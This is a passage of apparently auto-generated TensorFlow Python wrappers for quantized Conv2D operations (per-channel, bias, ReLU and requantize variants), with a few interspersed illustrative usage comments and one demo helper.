if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_per_channel' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedConv2DPerChannel", input=input, filter=filter,
min_input=min_input, max_input=max_input,
min_filter=min_filter,
max_filter=max_filter, strides=strides,
padding=padding, out_type=out_type,
dilations=dilations, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedConv2DPerChannel", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DPerChannelOutput._make(_result)
return _result
QuantizedConv2DPerChannel = tf_export("raw_ops.QuantizedConv2DPerChannel")(_ops.to_raw_op(quantized_conv2d_per_channel))
def quantized_conv2d_per_channel_eager_fallback(input, filter, min_input, max_input, min_filter, max_filter, strides, padding, out_type, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_per_channel' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_per_channel' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
_inputs_flat = [input, filter, min_input, max_input, min_filter, max_filter]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "out_type",
out_type, "strides", strides, "padding", padding, "dilations", dilations)
_result = _execute.execute(b"QuantizedConv2DPerChannel", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedConv2DPerChannel", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DPerChannelOutput._make(_result)
return _result
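# Example (illustrative sketch, unverified assumption): for the per-channel
# variant, `min_filter`/`max_filter` are expected to carry one range per
# output channel (here 8, matching the hypothetical `ker` above) rather than
# scalars. Kernel availability may again depend on the TensorFlow build.
#
#   out = tf.raw_ops.QuantizedConv2DPerChannel(
#       input=img.output, filter=ker.output,
#       min_input=img.output_min, max_input=img.output_max,
#       min_filter=tf.fill([8], -1.0), max_filter=tf.fill([8], 1.0),
#       strides=[1, 1, 1, 1], padding="SAME")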
_QuantizedConv2DWithBiasOutput = collections.namedtuple(
"QuantizedConv2DWithBias",
["output", "min_output", "max_output"])
def quantized_conv2d_with_bias(input, filter, bias, min_input, max_input, min_filter, max_filter, strides, padding, out_type=_dtypes.qint32, dilations=[1, 1, 1, 1], padding_list=[], name=None):
r"""TODO: add doc.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
bias: A `Tensor` of type `float32`.
min_input: A `Tensor` of type `float32`.
max_input: A `Tensor` of type `float32`.
min_filter: A `Tensor` of type `float32`.
max_filter: A `Tensor` of type `float32`.
strides: A list of `ints`.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint32`.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
padding_list: An optional list of `ints`. Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedConv2DWithBias", name, input, filter, bias, min_input,
max_input, min_filter, max_filter, "out_type", out_type, "strides",
strides, "padding", padding, "dilations", dilations, "padding_list",
padding_list)
_result = _QuantizedConv2DWithBiasOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_conv2d_with_bias_eager_fallback(
input, filter, bias, min_input, max_input, min_filter, max_filter,
out_type=out_type, strides=strides, padding=padding,
dilations=dilations, padding_list=padding_list, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedConv2DWithBias", input=input, filter=filter, bias=bias,
min_input=min_input, max_input=max_input,
min_filter=min_filter,
max_filter=max_filter, strides=strides,
padding=padding, out_type=out_type,
dilations=dilations,
padding_list=padding_list, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"), "padding_list",
_op.get_attr("padding_list"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedConv2DWithBias", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasOutput._make(_result)
return _result
QuantizedConv2DWithBias = tf_export("raw_ops.QuantizedConv2DWithBias")(_ops.to_raw_op(quantized_conv2d_with_bias))
def quantized_conv2d_with_bias_eager_fallback(input, filter, bias, min_input, max_input, min_filter, max_filter, strides, padding, out_type, dilations, padding_list, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
bias = _ops.convert_to_tensor(bias, _dtypes.float32)
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
_inputs_flat = [input, filter, bias, min_input, max_input, min_filter, max_filter]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "out_type",
out_type, "strides", strides, "padding", padding, "dilations", dilations,
"padding_list", padding_list)
_result = _execute.execute(b"QuantizedConv2DWithBias", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedConv2DWithBias", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasOutput._make(_result)
return _result
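# Example (illustrative call-shape sketch only): the bias-fused variant adds a
# float32 `bias` vector with one element per output channel. Reuses the
# hypothetical `img`/`ker`; the oneDNN/MKL kernel caveats above apply.
#
#   out = tf.raw_ops.QuantizedConv2DWithBias(
#       input=img.output, filter=ker.output, bias=tf.zeros([8]),
#       min_input=img.output_min, max_input=img.output_max,
#       min_filter=ker.output_min, max_filter=ker.output_max,
#       strides=[1, 1, 1, 1], padding="SAME")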
_QuantizedConv2DWithBiasAndReluOutput = collections.namedtuple(
"QuantizedConv2DWithBiasAndRelu",
["output", "min_output", "max_output"])
def quantized_conv2d_with_bias_and_relu(input, filter, bias, min_input, max_input, min_filter, max_filter, strides, padding, out_type=_dtypes.qint32, dilations=[1, 1, 1, 1], padding_list=[], name=None):
r"""TODO: add doc.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
bias: A `Tensor` of type `float32`.
min_input: A `Tensor` of type `float32`.
max_input: A `Tensor` of type `float32`.
min_filter: A `Tensor` of type `float32`.
max_filter: A `Tensor` of type `float32`.
strides: A list of `ints`.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint32`.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
padding_list: An optional list of `ints`. Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedConv2DWithBiasAndRelu", name, input, filter, bias,
min_input, max_input, min_filter, max_filter, "out_type", out_type,
"strides", strides, "padding", padding, "dilations", dilations,
"padding_list", padding_list)
_result = _QuantizedConv2DWithBiasAndReluOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_conv2d_with_bias_and_relu_eager_fallback(
input, filter, bias, min_input, max_input, min_filter, max_filter,
out_type=out_type, strides=strides, padding=padding,
dilations=dilations, padding_list=padding_list, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias_and_relu' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias_and_relu' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias_and_relu' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedConv2DWithBiasAndRelu", input=input, filter=filter,
bias=bias, min_input=min_input,
max_input=max_input,
min_filter=min_filter,
max_filter=max_filter,
strides=strides, padding=padding,
out_type=out_type,
dilations=dilations,
padding_list=padding_list,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"), "padding_list",
_op.get_attr("padding_list"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedConv2DWithBiasAndRelu", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasAndReluOutput._make(_result)
return _result
QuantizedConv2DWithBiasAndRelu = tf_export("raw_ops.QuantizedConv2DWithBiasAndRelu")(_ops.to_raw_op(quantized_conv2d_with_bias_and_relu))
def quantized_conv2d_with_bias_and_relu_eager_fallback(input, filter, bias, min_input, max_input, min_filter, max_filter, strides, padding, out_type, dilations, padding_list, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias_and_relu' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias_and_relu' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias_and_relu' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
bias = _ops.convert_to_tensor(bias, _dtypes.float32)
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
_inputs_flat = [input, filter, bias, min_input, max_input, min_filter, max_filter]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "out_type",
out_type, "strides", strides, "padding", padding, "dilations", dilations,
"padding_list", padding_list)
_result = _execute.execute(b"QuantizedConv2DWithBiasAndRelu", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedConv2DWithBiasAndRelu", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasAndReluOutput._make(_result)
return _result
_QuantizedConv2DWithBiasAndReluAndRequantizeOutput = collections.namedtuple(
"QuantizedConv2DWithBiasAndReluAndRequantize",
["output", "min_output", "max_output"])
def quantized_conv2d_with_bias_and_relu_and_requantize(input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, strides, padding, out_type=_dtypes.quint8, dilations=[1, 1, 1, 1], padding_list=[], name=None):
r"""TODO: add doc.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
bias: A `Tensor`. Must be one of the following types: `float32`, `qint32`.
min_input: A `Tensor` of type `float32`.
max_input: A `Tensor` of type `float32`.
min_filter: A `Tensor` of type `float32`.
max_filter: A `Tensor` of type `float32`.
min_freezed_output: A `Tensor` of type `float32`.
max_freezed_output: A `Tensor` of type `float32`.
strides: A list of `ints`.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.quint8`.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
padding_list: An optional list of `ints`. Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedConv2DWithBiasAndReluAndRequantize", name, input,
filter, bias, min_input, max_input, min_filter, max_filter,
min_freezed_output, max_freezed_output, "out_type", out_type,
"strides", strides, "padding", padding, "dilations", dilations,
"padding_list", padding_list)
_result = _QuantizedConv2DWithBiasAndReluAndRequantizeOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_conv2d_with_bias_and_relu_and_requantize_eager_fallback(
input, filter, bias, min_input, max_input, min_filter, max_filter,
min_freezed_output, max_freezed_output, out_type=out_type,
strides=strides, padding=padding, dilations=dilations,
padding_list=padding_list, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias_and_relu_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias_and_relu_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias_and_relu_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedConv2DWithBiasAndReluAndRequantize", input=input,
filter=filter,
bias=bias,
min_input=min_input,
max_input=max_input,
min_filter=min_filter,
max_filter=max_filter,
min_freezed_output=min_freezed_output,
max_freezed_output=max_freezed_output,
strides=strides,
padding=padding,
out_type=out_type,
dilations=dilations,
padding_list=padding_list,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "Tbias",
_op._get_attr_type("Tbias"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"), "padding_list",
_op.get_attr("padding_list"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedConv2DWithBiasAndReluAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasAndReluAndRequantizeOutput._make(_result)
return _result
QuantizedConv2DWithBiasAndReluAndRequantize = tf_export("raw_ops.QuantizedConv2DWithBiasAndReluAndRequantize")(_ops.to_raw_op(quantized_conv2d_with_bias_and_relu_and_requantize))
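# ---------------------------------------------------------------------------
# Illustrative sketch for the requantizing variant above (editorial
# addition, not generated code). The frozen output range would normally come
# from calibration; the [0, 6] range below and the helper name are
# assumptions for the example.
def _demo_quantized_conv2d_with_bias_and_relu_and_requantize():
  import tensorflow as tf
  x = tf.random.uniform([1, 4, 4, 3], 0.0, 1.0)
  w = tf.random.uniform([2, 2, 3, 8], -1.0, 1.0)
  x_q, x_min, x_max = tf.quantization.quantize(x, 0.0, 1.0, tf.quint8)
  w_q, w_min, w_max = tf.quantization.quantize(w, -1.0, 1.0, tf.qint8)
  bias = tf.zeros([8], tf.float32)  # Tbias may be float32 or qint32
  # Unlike the non-requantizing op, the qint32 accumulator is rescaled
  # straight to quint8 using the pre-computed ("frozen") output range.
  return tf.raw_ops.QuantizedConv2DWithBiasAndReluAndRequantize(
      input=x_q, filter=w_q, bias=bias,
      min_input=x_min, max_input=x_max,
      min_filter=w_min, max_filter=w_max,
      min_freezed_output=0.0, max_freezed_output=6.0,
      strides=[1, 1, 1, 1], padding="SAME")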
def quantized_conv2d_with_bias_and_relu_and_requantize_eager_fallback(input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, strides, padding, out_type, dilations, padding_list, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias_and_relu_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias_and_relu_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias_and_relu_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tbias, (bias,) = _execute.args_to_matching_eager([bias], ctx, [_dtypes.float32, _dtypes.qint32, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
min_freezed_output = _ops.convert_to_tensor(min_freezed_output, _dtypes.float32)
max_freezed_output = _ops.convert_to_tensor(max_freezed_output, _dtypes.float32)
_inputs_flat = [input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "Tbias",
_attr_Tbias, "out_type", out_type, "strides", strides, "padding", padding,
"dilations", dilations, "padding_list", padding_list)
_result = _execute.execute(b"QuantizedConv2DWithBiasAndReluAndRequantize",
3, inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedConv2DWithBiasAndReluAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasAndReluAndRequantizeOutput._make(_result)
return _result
_QuantizedConv2DWithBiasAndRequantizeOutput = collections.namedtuple(
"QuantizedConv2DWithBiasAndRequantize",
["output", "min_output", "max_output"])
def quantized_conv2d_with_bias_and_requantize(input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, strides, padding, out_type=_dtypes.qint8, dilations=[1, 1, 1, 1], padding_list=[], name=None):
r"""TODO: add doc.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
bias: A `Tensor`. Must be one of the following types: `float32`, `qint32`.
min_input: A `Tensor` of type `float32`.
max_input: A `Tensor` of type `float32`.
min_filter: A `Tensor` of type `float32`.
max_filter: A `Tensor` of type `float32`.
min_freezed_output: A `Tensor` of type `float32`.
max_freezed_output: A `Tensor` of type `float32`.
strides: A list of `ints`.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint8`.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
padding_list: An optional list of `ints`. Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedConv2DWithBiasAndRequantize", name, input, filter,
bias, min_input, max_input, min_filter, max_filter,
min_freezed_output, max_freezed_output, "out_type", out_type,
"strides", strides, "padding", padding, "dilations", dilations,
"padding_list", padding_list)
_result = _QuantizedConv2DWithBiasAndRequantizeOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_conv2d_with_bias_and_requantize_eager_fallback(
input, filter, bias, min_input, max_input, min_filter, max_filter,
min_freezed_output, max_freezed_output, out_type=out_type,
strides=strides, padding=padding, dilations=dilations,
padding_list=padding_list, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedConv2DWithBiasAndRequantize", input=input, filter=filter,
bias=bias,
min_input=min_input,
max_input=max_input,
min_filter=min_filter,
max_filter=max_filter,
min_freezed_output=min_freezed_output,
max_freezed_output=max_freezed_output,
strides=strides,
padding=padding,
out_type=out_type,
dilations=dilations,
padding_list=padding_list,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "Tbias",
_op._get_attr_type("Tbias"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"), "padding_list",
_op.get_attr("padding_list"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedConv2DWithBiasAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasAndRequantizeOutput._make(_result)
return _result
QuantizedConv2DWithBiasAndRequantize = tf_export("raw_ops.QuantizedConv2DWithBiasAndRequantize")(_ops.to_raw_op(quantized_conv2d_with_bias_and_requantize))
def quantized_conv2d_with_bias_and_requantize_eager_fallback(input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, strides, padding, out_type, dilations, padding_list, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
